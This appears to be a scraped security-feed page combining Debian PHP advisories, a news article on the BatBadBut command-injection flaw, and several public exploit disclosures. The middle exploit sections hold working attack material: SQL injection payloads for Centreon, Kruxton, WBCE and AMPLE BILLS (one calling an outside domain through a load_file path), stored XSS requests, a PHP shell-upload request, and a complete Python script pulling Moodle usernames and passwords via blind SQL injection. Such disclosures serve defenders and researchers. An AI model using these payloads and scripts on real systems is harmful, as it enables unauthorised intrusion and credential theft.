Debian Linux Security Advisory 5661-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5661-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the stable distribution (bookworm), these problems have been fixed inversion 8.2.18-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYMACgkQEMKTtsN8TjbrZxAAotqJ1fIulmY7fP/Ll2Gb/aoswnUqZTNiZH/yrzwX86cggI61EaWXc/JW7O5i7+U4y63ZIl5M6HVFk5bNgnj6Rwl5bT+jz8dbqLKkphIkT0754h1bdXCaW73riiNztNclAITPYMOntY7TEWZuqS2p4cNjUuHYoPiqCLU8ASMoi/z2DHFWBc6uBLRRRqbhbdFbWeekzc6nt+JZmEVD9JLXsh8kO4/f5o1pbCx6pYerWM1Win5AW6ZBSNMd5xO5DTP3F/RX7BEyH7rTQ0y2TRCY4qk2LKG4cojqidgHIpCiTiFiKvk9W3EJZdKebrzHyBgEixzCImvYze68j0M0ruxWiTTozKEn9Tj7DSPNoD+vB6U8kGAqmG3b5q+pw9BSCQ+AZ25HvDqdasH8gaj8Ji4xAhWxVutQRrSbhcf3xKu8Y6taz3ANIRXBmgjEARhK9p4b66KauAxG5GavWQQQprcbzt0deGUK6WkxigQ04l38kIrD9XIXnMHBEH4/Aas8E6zv8+j+18RdPaSGDGTAvuJD/C9GQjWfIvRXYVjUKarlWgtrgDoxGIMlOIHhRwgyJdZzJAx2vAY2o1CYmtIS59zReqwK+rAtogFi2RIoruVPGLccgxcqJOtvJF7MXGBAVp+3Wi4SFK5QHu1ISlngw+LkNJdkz1yXcUVI6vLt0QQEt94==xxUv-----END PGP SIGNATURE-----

Debian Security Advisory 5661-1

Debian Linux Security Advisory 5660-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5660-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the oldstable distribution (bullseye), these problems have been fixedin version 7.4.33-1+deb11u5.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYIACgkQEMKTtsN8Tjavcw//TgnidCQ8c0hut2Ni6PP87fZH1uZZM+gAjUxS46UpNjsDtlu9WwXAxH09+uq0tg/dvKQLkC5W5gnUBiYhiOVoo9U75QP8oK2EYXyswXuEsb9tUhI/hEYr7KYaNHPRbSxZoowi6hKpXXpjoXc/+J9nghykSL9WeADJw4qP6QTclN274IfSujpmx6z+YqApbtW8wzACmHpdvXfCge09NHiN0Z/U8mpd99JBNIYGJGaSDmGNrnGMzBhOms+PTCqQQZPWgWh4RlggNSlslEadGN1huf1KpdHlPvSEfRavmzloX1Vt+XUrJM47nkD3y6y5TtckhGm7horXlskSovkNQZoa5G8NhAT1trzhfP07QJWJBrcc8MZzJQYiwlqZAf/zY8/UcusrJj3Y8BdkfbdWb69PA6sC2qTDuj48p7adgYBZ5YOwmrC4dcwdRd9laGqnZAhk1htX19Gzt1gYL2wDPMU+2x+F0rbemXGS6UwRmrkSlTiWVka+T5y+JpC8lLXFR2dwF2KAdUK4dWPd5QUrNb0Tk9dBcEZuyLRevindp7gCKLx/1y/RsrNxT8b1yW5yUp9jtePFa83+jNyojvURlC0SAgTcwEUhltob4vsTAccZZSza3cxOlqzC7ysNd0TKz20rTZFKreygYyIXfmHHaWoYbiK5IEy1ogOVho9SXUYJ7Mc==ZcwU-----END PGP SIGNATURE-----

Debian Security Advisory 5660-1

Centreon version 23.10-1.el8 suffers from a remote authenticated SQL injection vulnerability.

    ;; Postauth SQL Injection in Centreon 23.10-1.el8;; by code610;; ;; found : 05.03.2024;; version: centreon-vbox-vm-23_10-1.el8.zip;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html;; ;; sqlmap request.txtPOST /centreon/main.get.php?p=60201 HTTP/1.1Host: 192.168.56.156User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 2529Origin: http://192.168.56.156Connection: keep-aliveReferer: http://192.168.56.156/centreon/main.get.php?p=60201&o=aCookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avhUpgrade-Insecure-Requests: 1service_description=2222222222xxxxxxxx22&service_hPars%5B%5D='%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134&macroInput%5B0%5D=MODE&macroValue%5B0%5D=connection-time&macroFrom%5B0%5D=fromTpl&macroTplValue_0=connection-time&macroOriginalName_0=&macroTplValToDisplay_0=1&macroDescription_0=&macroTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=&macroInput%5B1%5D=WARNING&macroValue%5B1%5D=1000&macroFrom%5B1%5D=fromTpl&macroTplValue_1=1000&macroOriginalName_1=&macroTplValToDisplay_1=1&macroDescription_1=&macroTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=&macroInput%5B2%5D=CRITICAL&macroValue%5B2%5D=5000&macroFrom%5B2%5D=fromTpl&macroTplValue_2=5000&macroOriginalName_2=&macroTplValToDisplay_2=1&macroDescription_2=&macroTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save&macroFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1&centreon_token=0e87a8f24318f5221765b62c09cb10bf;; --- ;; init response:        <a href="main.php?p=60201"             class="pathWay">Services by host</a>        </div>SQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not defined<br /><b>Fatal error</b>:  Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=prompt(123)>' AND hsr.service_service_id = service_id AND servi...' at line 1 in /usr/share/centreon/www/class/centreonDB.class.php:311Stack trace:#0 /usr/share/centreon/www/class/centreonDB.class.php(311): PDO->query()#1 /usr/share/centreon/www/include/configuration/configObject/service/DB-Func.php(281): CentreonDB->query()#2 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/Rule/Callback.php(57): testServiceExistence()#3 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/RuleRegistry.php(130): HTML_QuickForm_Rule_Callback->validate()#4 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm.php(1315): HTML_QuickForm_RuleRegistry->validate()#5 /usr/share/centreon/www/include/configuration/configObject/service/formService.php(1156): HTML_QuickForm->validate()#6 /usr/share/centreon/www/include/configuration/configObject/service/serviceByHost.php(127): require_once('...')#7 /usr/share/centreon/www/main.get.php(304): include_once('...')#8 {main}  thrown in <b>/usr/share/centreon/www/class/centreonDB.class.php</b> on line <b>311</b><br />;; --- ;; More:;;   https://code610.blogspot.com;;   https://twitter.com/CodySixteen;; ;; cheers;;

Centreon 23.10-1.el8 SQL Injection

WordPress WP Video Playlist plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)# Date: 12 April 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.1.1# Proof Of Concept:1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w# Vulnerable Property at Request: videoFields[post_type]# Payload: <script>alert(document.cookie)</script># Request:POST /wp-admin/options.php HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 395Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=video_managerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, ioption_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

Kruxton version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: kruxton-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/15/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''OR NOT 7810=7810 OR 'LaNe'='bRUy&password=v0N!p1j!S6    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 1998 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT(ELT(1998=1998,1))),0x716b627071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'jdui'='fNTo&password=v0N!p1j!S6    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 2923 FROM (SELECT(SLEEP(7)))UJBe) OR'ffIk'='SAqf&password=v0N!p1j!S6---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0/Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-multiple-sqli.html)## Time spent:01:15:00

Kruxton 1.0 SQL Injection

Kruxton version 1.0 suffers from a remote shell upload vulnerability.

## Title: kruxton-1.0-FileUpload-RCE  
## Author: nu11secur1ty  
## Date: 04/15/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The system setting with parameter IMG is vulnerable to File Upload  
vulnerability.  
The attacker can upload a very malicious PHP file into the server and  
then he can execute it  
This is a potential CRITICAL PROBLEM!

STATUS: HIGH- Vulnerability

[+]Payload:  
```POST  
POST /kruxton/ajax.php?action=save_settings HTTP/1.1  
Host: localpwnedhost.com  
Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;  
PHPSESSID=lp21rf44drtnogjboa8v7lpmg1  
Content-Length: 1043  
Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8"  
Accept: */*  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://localpwnedhost.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://localpwnedhost.com/kruxton/index.php?page=site_settings  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=1, i  
Connection: close

------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="name"

Kruxton Bristo By Mayuri K  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="email"  
mayuri.infospace@gmail.com  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="contact"

9000000000  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="about"

<p>Kruxton Bristo By Mayuri K</p><p data-f-id="pbf" style="text-align:  
center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:  
sans-serif;">Powered by <a  
href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala  
Editor">Froala Editor</a></p>  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2024  
//Your malicious code here  
?>

------WebKitFormBoundaryUwsdkjlNQ5exBwrq--  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-fileupload-rce.html)

## Time spent:  
00:15:00

Kruxton 1.0 Shell Upload

WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0  
# Date: 15.11.2023   
# Exploit Author: young pope   
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS   
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip   
# Version: 1.6.0   
# Tested on: Kali linux   
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a   
default module installed in the *WBCE* cms. It is an unauthenticated   
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no   
authentication check. On line |40| in this file, there is a |DELETE|   
query that is vulnerable, an attacker could jump from the query using   
tick sign - ```.

Function |addslashes()|   
(https://www.php.net/manual/en/function.addslashes.php) escapes only   
these characters and not a tick sign:

  * single quote (')  
  * double quote (")  
  * backslash ()  
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796  
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046  
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1  
  * https://pastebin.com/PBw5AvGp

WBCE 1.6.0 SQL Injection

AMPLE BILLS version 0.1 suffers from a remote SQL injection vulnerability.

    ## Title: AMPLE BILLS 0.1 Multiple-SQLi## Author: nu11secur1ty## Date: 04/13/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The customer parameter (#1*) appears to be vulnerable to SQL injectionattacks. The payload (select*from(select(sleep(20)))a) was submittedin the customer parameter. The application took 20017 milliseconds torespond to the request, compared with 4 milliseconds for the originalrequest, indicating that the injected SQL command caused a time delay.The database appears to be MySQL. The attacker can get all informationfrom the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: #1* ((custom) POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: customer=(-2876) OR5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024    Type: UNION query    Title: MySQL UNION query (random number) - 1 column    Payload: customer=(-8147) UNION ALL SELECTCONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024- 04/13/2024---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)## Time spent:01:15:00

AMPLE BILLS 0.1 SQL injection

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Moodle 3.10.1 SQL Injection

By Deeba Ahmed
Critical 'BatBadBut' Flaw in Windows Lets Hackers Inject Commands (Patch Now!)
This is a post from HackRead.com Read the original post: Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

Flatt Security has discovered a critical vulnerability called “BatBadBut” that could allow attackers to inject malicious commands into Windows applications. The flaw, discovered by Flatt Security’s security engineer RyotaK, affects multiple programming languages. It was reported to the CERT Coordination Center and registered as CVE-2024-24576 on GitHub with a severity score of 10.0.

****What’s the Issue?****

Windows Rust developers are being urged to update their versions due to a critical vulnerability called ‘BatBadBut’, which could lead to malicious command injections on machines. The vulnerability affects the Rust standard library, which improperly escaped arguments when invoking batch files on Windows using the Command API.

BatBadBut vulnerability allows attackers to inject commands into Windows applications that rely on the ‘CreateProcess’ function. This is because cmd.exe, which executes batch files, has complex parsing rules and programming language runtimes fail to escape command arguments properly.

****Why it Occurs?****

The ‘BatBadBut’ issue occurs from the interaction between programming languages and the Windows operating system. When a program calls the “CreateProcess” function, Windows launches a separate process, “cmd.exe,” to handle the execution. This separate process parses the commands in the .bat file. 

For your information, Windows by default includes .bat and.cmd files in the PATHEXT environment variable, which can cause runtimes to execute batch files against developers’ intentions. An attacker can inject commands into Windows applications by controlling the command arguments section of batch files. To do this, the application must execute a command on Windows, specify the command file extension, control the command arguments, and fail to escape them.

“Some runtimes execute batch files against the developers’ intention if there is a batch file with the same name as the command that the developer intended to execute,” ” Ryotak explained.

****Impacted Applications****

Haskell process library, Rust, Node.js, PHP, and yt-dlp are affected by this bug. The Rust Security Response Working Group was notified on April 9 2024 that the Rust standard library, which is used to invoke batch files on Windows, is not properly escaping arguments, allowing attackers to execute arbitrary shell commands by bypassing the escaping. Haskell, Rust, and yt-dlp have issued patches.  

Ryotak reports that this isn’t an “internet breaking vulnerability” and most applications are not affected by it with several mitigations already available. Some programming languages have addressed it by adding an escaping mechanism. In addition, BatBadBut only affects Rust versions before 1.77.2, affecting no other platform or use.

****Mitigation Strategies:****

Researchers advise developers to exercise caution when using functions that interact with external processes, especially when dealing with user-supplied data. They recommend validating and sanitizing user input before incorporating it into commands, using safe alternatives, and staying updated with the latest security patches and fixes provided by framework and library developers.

1.  Rust-Based macOS Backdoor Linked to Ransomware Gangs
2.  Windows Defender SmartScreen Flaw Exploited with Malware
3.  Rust-Based Injector Deploys Remcos RAT in Multi-Stage Attack

Tag

#php